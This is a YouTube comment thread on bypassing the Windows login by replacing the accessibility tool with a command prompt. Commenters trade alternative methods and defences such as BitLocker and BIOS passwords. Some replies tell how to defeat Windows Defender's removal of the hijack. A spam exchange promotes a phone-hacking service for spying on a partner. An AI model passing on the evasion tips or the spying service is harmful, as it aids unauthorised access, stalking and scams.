      @@RassieKariuki IF there is any local account. When you connect to ms account, isn't local account are removed or deleted?

    • @geroffmilan3328
      @geroffmilan3328 Рік тому

      ​@@rebel__rana correct.
      And by default in Win10 onwards the process defaults to asking you for a Microsoft/AzureAD account.

  • @luismarrero9293
    @luismarrero9293 Рік тому +1

    thanks liang this is an old way to access windows but still good even on windows 11. thanks for all the content, videos , etc always super interesting. By the way if you dont have a bootable windows installation winpe will work too. anything that allow you to access cmd is ok.

  • @pandox_2420
    @pandox_2420 Рік тому +5

    These hijacks will be detected as Win32/AccessibilityEscalation and will cause Windows Defender to automatically remove the offending debugger from the Registry key.

    • @Exprotionen
      @Exprotionen Рік тому

      Is there a way to make this not happen?

    • @pandox_2420
      @pandox_2420 Рік тому

      @@Exprotionen yea i would think you could disable windows defender

    • @david808323
      @david808323 Рік тому

      @@Exprotionen yes, change the security on the file to block everyone, including System and TrustedInstaller.

    • @Compute_and_Hack
      @Compute_and_Hack 2 місяці тому

      In.cmd is it possible?

    • @pandox_2420
      @pandox_2420 2 місяці тому

      @@Compute_and_Hack nope windows defender will detect the Blackfoot in your regestry

  • @martinedel8448
    @martinedel8448 Рік тому

    For some reasons I am happy that I have Linux at home and Windows in office :D. Of course not all is safer in Linux but quite a few things really are.

  • @TheNimaMohammadi
    @TheNimaMohammadi Рік тому +8

    Excellent😍

  • @picsnmorede
    @picsnmorede Рік тому

    Nice thought, but does it work on encrypted drives, too?
    And does STRG F10 also work in a later point of the installation process (i.e. if you have to load controller driver first as you have to on modern computers with NVME-Drives)?

  • @katelona13
    @katelona13 10 місяців тому +6

    I dont know what I would have done without almods geniues help in my divorce case. Your dedication, enthusiasm, and expertise were like a lifesaver. youre my hero!

    • @daniellasanchez7521
      @daniellasanchez7521 10 місяців тому +3

      how did they do it, did you see live locations too

    • @katelona13
      @katelona13 10 місяців тому +1

      yes they gave me full phone datas

    • @daniellasanchez7521
      @daniellasanchez7521 10 місяців тому +3

      can i see the harka emall pls, i'll like to see my partner phones aswell

    • @katelona13
      @katelona13 10 місяців тому

      all genues

    • @katelona13
      @katelona13 10 місяців тому

      @ G m a l l.

  • @calebjones3905
    @calebjones3905 Рік тому

    I actually learned this on my own when playing around trying to download games on our school computers. Eventually was able to play CSGO and some other stuff lol.
    Good times!

  • @joeneighbor
    @joeneighbor Рік тому +2

    Just boot from a Ubuntu live on a thumb drive and clear the password.

    • @Compute_and_Hack
      @Compute_and_Hack 2 місяці тому

      How... I have Kali live.
      . how would y clear the passwd🙍

    • @joeneighbor
      @joeneighbor 2 місяці тому

      @@Compute_and_Hack I had to walk though a tutorial every time I've done it.
      Did it last time about a year ago still worked fine with Windows 10 64bit.

  • @OFFRoadWheels
    @OFFRoadWheels Рік тому

    I did this on a Windows Server 2012 Enterprise back the day also to know that anybody with low-level access to help me file helps you find a lot

  • @DEATHIAM6
    @DEATHIAM6 Рік тому +5

    That is far more steps than necessary. Lol Personally, I would just boot in safe mode cmd prompt w/ networking. From there, use the netuser command and simply change the psw via dos commands

    • @13aker0
      @13aker0 Рік тому

      should work on machines with Bitlocker OFF.. and sadly most recent laptops have them enabled by default and users are encouraged to do so if not yet done.

    • @SOTP.
      @SOTP. Рік тому

      that doesnt allow u to acces admin account...

  • @luisderivas6005
    @luisderivas6005 Рік тому +1

    Similar approaches exist for Linux (pick your flavor), OSX, CAN-BUS, etc. If you want to make it hard, encrypt your volumes...the reason for the big TPM push. But if I have physical access to the device, that is already half the battle.

    • @swimfan6292
      @swimfan6292 Рік тому

      Canbus, osx don't belong in the same sentence lol. It's like comparing USB and ChromeOS... They don't use canbus on personal computers. But you can use a Bluetooth elm327 chip to interface over serial bus with your obd2 logger if it's the rightbkind

  • @mrcheeks7335
    @mrcheeks7335 Рік тому +3

    You told us the trick....but you should also tell how to prevent this.
    A. Bitlocker only available on windows pro (so the drive cannot be removed and read in another computer)
    B. A Bios password that prevents anyone from even getting into the windows login screen in the first place.
    Please upvote soo everyone knows how to defend against this. =D

    • @RobbieHatley
      @RobbieHatley Рік тому

      I'm not familiar with bit-locker; I'd have to look that up. I don't use any kind of Windoze (currently all my computers are running Manjaro Plasma instead). But I wonder if a Linux-compatible technology exists to prevent drive transplant from working? (LUKS is nice, but only works on data drives and only works if you install it when formatting the drive before writing data.)
      BIOS passwords on most computers can be reset in 30 seconds by popping-off left-side cover, moving "clear CMOS" jumper to "clear" then back to "run", the putting left-side cover back on; voila, no more BIOS password.
      Windows passwords are a joke if an attacker is able to get their hands physically on your computer. They can just boot from a Nordahl USB, set all the passwords to empty, remove USB stick, press reset, and voila, all Windows passwords are blank.

    • @david808323
      @david808323 Рік тому

      What makes you think Bitlocker can't be cracked? It can, and is done.

  • @ConveyApp
    @ConveyApp Рік тому

    Back in the day, probably early Windows XP, bypassing the windows login was super easy. I would press F8 into safe mode. Then from safe mode you could remove the password from all users. Then reboot. No no more password.

  • @incremental_failure
    @incremental_failure Рік тому +6

    This is like 20 years old. But you don't need any Windows installation as long as you can access the NTFS filesystem.

    • @HyperVectra
      @HyperVectra Рік тому

      Thanks for that, I'll switch to FAT32 right away

    • @incremental_failure
      @incremental_failure Рік тому

      @@HyperVectra Fine, *any* unencrypted filesystem. Does Win10/11 even work with FAT32?

  • @natekelly4174
    @natekelly4174 Рік тому

    Can you also use the command prompt from advanced troubleshooting options? I work remotely and sometimes clients don’t have access to removable media.

  • @infinitybrutal
    @infinitybrutal Рік тому +10

    That's What We Need

  • @AndyHerbert254
    @AndyHerbert254 Рік тому

    FYI, BitLocker (or any) encryption with secure boot (secure boot optional) makes this hack entirely obsolete. Even if you only use the rather insecure TPM you'll need the full recovery key to access the files from the USB or any OS that is not the installed Windows OS itself (unless you have admin access before restarting, which means you can pause encryption, but at that point why go thru all these steps to log in again?).
    It could be possible with only the TPM to inject some code into the Windows boot process from a USB device which would override utilman, so I recommend also setting a Bitlocker PIN/password (also VeraCrypt support TPM+password please, TPM isn't always "redundant"). And make sure to have an admin password set in the bios to make sure the boot order can't be reordered (though the bios can sometimes be easily reset without the password, but then this would trigger secure boot failing, forcing a bitlocker recovery code)

  • @arjan-nuts-gaming
    @arjan-nuts-gaming Рік тому +8

    Lol... This is NOT hacking... Its just using a feature. Using it often when a client forgets his password. This is also a reason why you encrypt your SSD/HDD... It will not work :)

  • @tye595
    @tye595 Рік тому +1

    i remember doing this but with the sticky key function .... doesn't matter where you are just spam on shift and you have cmd

  • @aribpm
    @aribpm Рік тому +6

    Who uses a computer anymore?

  • @oneandonly3560
    @oneandonly3560 Рік тому

    Choice, Clever, Parsimonious...you are an Oracle my friend, an Oracle indeed. AYE!

  • @Dr.Cosmar
    @Dr.Cosmar Рік тому

    Do you need the flashdrive though?
    Won't recovery mode have a command prompt?
    (Hold shift while selecting power > restart)

  • @brightdorian2890
    @brightdorian2890 Рік тому +1

    Many think this is a bug or security vulnerability but I don't think so, I think this is just a backdoor to help users reset their own passwords. Kali linux also has a similar backdoor like this, with that, you don't even need a usb.
    The only time this becomes a vulnerability is when you have important documents on your PC and someone needs those documents and steals the PC. Even these days ppl normally save their documents in the cloud

  • @Ifalvarado
    @Ifalvarado Рік тому +2

    for a moment i thought this was to give you the actual password, not change it, there are tons of tools for that for the SAM file. Still nice find

  • @truepatriot2797
    @truepatriot2797 Рік тому +1

    So just to clarify to create the installation media would be done on a different computer correct?

  • @foonlam7134
    @foonlam7134 Рік тому +2

    Does this work if your computer is running off the company's network?

  • @uvgrv
    @uvgrv Рік тому +1

    While this did exist since the days of Windows 7, a lot of you are forgetting one thing.
    the ability to access your main drive from the built-in recovery mode has been revoked in Windows 10. Its true that you can access your main drive using some recovery mode loophole in windows 7, but in Windows 10 you would in fact need a installation drive so that you'd be able to access it.
    Spoken as a true IT guy who unfortunately had to deal with a lot of dumb people in the workplace who managed to forget their password to local accounts :D

  • @TrevorYogi
    @TrevorYogi Рік тому

    This is nice and useful..i’ve been using this trick since 2013 as far as i remember…

  • @SteveSiegelin
    @SteveSiegelin Рік тому

    I've used UA-cam to bypass every Windows security screen since 2012. Back when I was younger I had all the OEM hotkeys and a plethora of software. Never needed any software to bypass the Windows screen except for maybe a recovery disk. I made this comment before I even watched your video but it's to highlight that yes it's always been very easy to get around if you are smart enough to find the research but I've never been that guy to figure it out myself😅

    • @SteveSiegelin
      @SteveSiegelin Рік тому

      This is the trick I learned! To this day I still haven't had a chance to attempt a Windows 11 machine but I've never been beaten by Windows yet 😂

    • @SteveSiegelin
      @SteveSiegelin Рік тому

      PS the CMD feature can be your best friend if you learn how to use it properly

  • @alexstone3349
    @alexstone3349 Рік тому

    “V” for Vendetta is one of my favorite movies. Thanks

  • @aaronjackson7942
    @aaronjackson7942 Рік тому

    Quick question! How would I undo the easee of acces cmd prmt window at the login screen? I used this to get into an old laptop my friend lost their password for and wanted to stop access to that now